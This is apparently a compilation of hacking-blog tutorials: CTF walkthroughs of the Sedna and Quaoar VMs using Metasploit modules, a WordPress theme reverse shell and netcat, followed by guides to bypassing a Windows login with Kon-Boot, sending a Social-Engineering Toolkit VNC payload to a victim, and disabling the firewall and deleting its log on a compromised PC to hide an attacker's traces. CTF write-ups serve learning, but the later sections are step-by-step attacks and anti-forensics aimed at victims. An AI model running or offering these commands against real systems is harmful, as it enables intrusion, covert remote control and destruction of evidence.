Hack the Sedna VM (CTF Challenge)

Today we found a Vulnerable Lab based on the 90377 Sedna. Sedna is a dwarf planet in our solar system. This vulnerable machine was created for the Hackfest 2016. We are going to download the VM Machine from here.

The credit for developing this VM machine goes to Viper.

Penetrating Methodologies

1.      Scanning Network

·        TCP and UDP ports scanning using nmap

2.      Testing Port 80

·        Surfing HTTP service on Web Browser

3.      Directory Scanning

·        Scanning using nikto

4.      Exploiting BuilderEngine

·        Using the Metasploit module to get meterpreter session

5.      Retrieving Flag 1

6.      Exploiting chkrootkit

·        Using the Metasploit module to get the root shell

7.      Retrieving Flag 2

Let’s Breach!!!

As always, Let’s start from doing a port enumeration on the IP Address using the nmap tool. (Here, we have it at 192.168.1.110 but you will have to find your own).

nmap -sV 192.168.1.110

From the NMAP Version Scan we enumerated the following details:

Port No.	Service
Port 22	SSH
Port 53	ISC Bind
Port 80	HTTP
Port 110	POP3
Port 111	RPC Bind
Port 139	NetBIOS
Port 143	Imap
Port 445	NetBIOS
Port 993	SSL/IMAPS
Port 995	SSL/POP3S
Port 8080	HTTP

As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.

Here we decided to scan the target directory using nikto scan. Now open the terminal in Kali Linux and type the following command:

nikto -h http://192.168.1.110/

From the scanning result, we chose the highlighted file link for further enumeration. That is the license.txt.

Opening the license.txt in our browser gave us our way in. This is what we looking for in the first place. If we take a closer look than we can find that we have the BuilderEngine 2015 version installed on the target system. A little bit of research here and there and we learned that we have a module in Metasploit that we can use to get a meterpreter session on the target machine.

So, let’s work on it. Firstly, we will open a terminal in out Kali Linux and then we will type msfconsole on it. This will open Metasploit Framework. After this we will proceed by using the module and providing it with RHOST. RHOST is the remote host IP address, which in our case is 192.168.1.110.

use exploit/multi/http/builderengine_upload_exec

set rhosts 192.168.1.110

exploit

After exploiting, we get a meterpreter session as shown in the given image. We used the sysinfo command to get the information about the target machine and we can observer that it is Sedna. Now we use the pwd command to retrieve the working directory we have the shell in. It is /var/www/html/files.

Now, that we are inside the target machine all that we need is to retrieve the flags and complete the challenge completely. After doing a bit enumeration here and there, we found a flag inside the /var/www directory. So, we traversed to that directory using the cd command. Now to read the flag we need to get a bash shell over the machine. Now, we will use the shell command to get a bash shell but what we got was an improper shell. So, we will use the python one liner to get a proper shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Since we have the proper shell now, let’s read the flag using the cat command.

Now, let’s work out our way to another flag. We traversed to the /etc directory and here we found the directory named chkrootkit. On traversing inside it, we get a README. Upon reading the README we get the version of chkrootkit. The version is found out to be 0.49.

Let’s get back to our beloved Metasploit and search for an exploit for the chkrootkit. We learned that we have a module in Metasploit that we can use to get a root shell on the target machine.

So, let’s work on it. On the Metasploit terminal. After this we will proceed by using the module and providing it with the session id.

use exploit/unix/local/chkrootkit

set session 1

exploit

This gives us a shell whose privilege we checked using the id command. We checked the contents of the directory using the ls command. We can see the flag.txt inside this directory. Now for the final step, we will use the cat command to read the root flag

Hack the Quaoar VM (CTF Challenge)

Once again we are with the Vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box. You can download this VM from here.

Let’s start..

Firstly, scan the target IP with aggressive scan using Nmap tool as given in the image.

nmap -p- -A 192.168.1.24

With the nmap result you can see that port 22, 53, 80, 110, 139, 143, 445, 993 and 995 are open with the services like SSH, HTTP and many others.

Since port 80 is working, open the victim IP 192.168.1.24 in the browser. You can see its home page in the image below :

Nmap scan also shows that robots.txt. Once accessed robots.txt it will show you that website is in wordpress, which is exploitable to in this scenario.

Let’s check out wordpress directory in the browser once.

Further, when I explored the following path: 192.168.1.24/wordpress/wp-login.php in the browser, I found a WordPress administrator console.

To breach administrator console of the WordPress we can use WPScan tool; now type the following command to start wpscan enumeration.

wpscan --url http://192.168.1.24/wordpress/ --enumerate u

WPScan’s result will show two users as you can see in the image below. We will move forward with admin user.

I used default log in credentials i.e. admin:admin and therefore I was logged in as Admin. Now, under the console we can upload any theme, taking advantage of the rights we have obtained, we will try to upload the malicious script to achieve reverse connection from victim’s system. The script we will use can be downloaded from : http://pentestmonkey.net/tools/web-shells/php-reverse-shell 

Now copy the PHP text from *  and paste it as new theme under selected 404.php template.

Now type the following commands to have session through netcat :

nc –lpv 1234

Once you have the session, use the following commands to navigate around :

cd /home

ls

In /home I found wpadmin folder which is obviously important so let’s check it for a flag using following commands :

cd wpadmin

ls

cat flag.txt

This way, in the above image you see that we have found our first flag.

Another important file in wordpress is Wp-config.php. Therefore, after  exploring this file I found MYSQL Setting. This contained credentials for root. If you notice the image below you’ll observe that the username and password i.e. root: rootpassword

Let’s switch the user to root and then in the root folder you will find the second flag too. So, use the  following commands for the said task :

su

rootpassword!

cd /root

ls

cat flag.txt

Now, we all know that cron.d is an important linux directory and I just checked it for the sake of it and there I found our last and third flag. Use the following commands to achieve that :

cd /etc

cd cron.d

ls

cat php5

Ohh-Yah!  We have successfully captured all 3 flags. Hence, we have successfully completed the CTF.

 Author: Arpit Pandey is a Certified Ethical Hacker, Cyber Security Expert, Penetration Tester. Contact here

Bypass Windows Login Password using Android Phone with DriveDroid

Drive Droid is an Android application that allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go... without the need to burn different CDs or USB pen drives.

Drive Droid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone. You can also create USB-images which allow you to have a blank USB-drive where you can store files in. Blank images also allow you to use tools on your PC to burn images to the drive and create a bootable USB disk that way.

You can manually download it from google playstore.

Note: need root privilegde means you need rooted phone.

Let’s start!!!

Install DriveDroid app on your smartphone and run the application.

Click on plus sign at the lower right corner to add any iso image file.

Under preference here we need to select image directories so that we can browse konboot iso image file.

Further it will move into internal storage to let you choose your iso file, I have opt for konboot.iso and click on select (Please note that the kon-bootCD.iso file should exist on your phone)

Selected the koonboot iso file and it will get mounted

Tap on the mounted file and we can see three boot options as shown in the figure below Select the third option of CD-ROM and connect the smart phone with the system and reboot the system

Now plug the USB cable between phone and system for booting it from your phone and restart the system (pc) then continuously press function key of your desktop system.

Great!!! Successfully you will get administration console; now hit the enter button on the key board. This will bypass the admin console without entering password.

Capture VNC Session of Remote PC using Settoolkit

Today in this article we are going to compromise the target through VNC payload attack. It is a very simple method for beginners.

In this tutorial, we will learn how to create a VNC payload using Social Engineering Toolkit. We will try to achieve VNC shell of victim’s PC.

Let’s Start!!!

Open a terminal in Kali Linux, and type “setoolkit” on it to start the Social Engineering Toolkit Framework.

Select the first option to choose from the list of Social-Engineering Attacks.

Press '1'

To proceed further we will choose "Create a Payload and Listener" option.

Press '4'

This will show an arsenal of different payloads. As in this article our focus is VNC, hence we will select the VNC payload.

Press '3'

Next Step requires an IP address on which the payload listener is to be started. In our case it is 192.168.1.109(attacker's IP) and after that it will ask for the port for reverse listener. In our case it will be 4444

After setting up this, it starts generating VNC payload and save it under highlighted path. Explore /root/.set/payload.exe. Send the payload.exe file to the target.

Further it will ask to start payload listener Type "yes" and hit "Enter" this will start loading the Metasploit Framework.

After loading the Metasploit Framework, it runs the multi handler automatically; Now once the victim clicks on the payload file sent by the attacker, attacker will get a VNC shell.

Great!!!!

Our VNC attack using set toolkit is successful and we received the victim's VNC

shell on our system.

How to Delete Firewall Log in Remote PC using Metasploit

This article is only for tutorial purpose where we are trying to share our experience to enhance skills of IT researchers. This article will help attackers to protect themselves if they were caught by firewall. Usually when an attacker establish the connection with target’s system a log is generated having some details like time, ports, IP address and MAC address of attacker. So if you are not aware of such things then you might leave an evidence of your attacks in victim’s system. To prevent yourself you must go through this article where you will learn how to read the firewall logs as well as how to delete the logs from victim’s PC.

Being an intelligent attack once you have hacked the target then after fetching important data the most essential thing is to read and delete the log files from the target system.

First hack The Victim PC read Here

So now we are inside windows/system32 where we can perform admin level task. Type following command inside CMD shell to move inside the logs directory

cd logfiles/firewall

Type dir to observe the present directory of firewall.

Dir

From screenshot you can find that there are two files and two directories, therefore being an attacker I need to check the log firewall from target PC. Now Type following command to read firewall logs.

type pfirewall.log

So the highlighted log is showing MAC address of attacker system. Hence to protect yourself always delete these logs.

To delete pfirewall.log we must turn off firewall, type following command to disable firewall from victim PC.

Netsh firewall set opmode mode= DISABLE

Now type given below command to delete pfirewall.log

Del pfirewall.log

Now type given below command to verify pfirewall.log is still available or not in victim’s PC

type pfirewall.log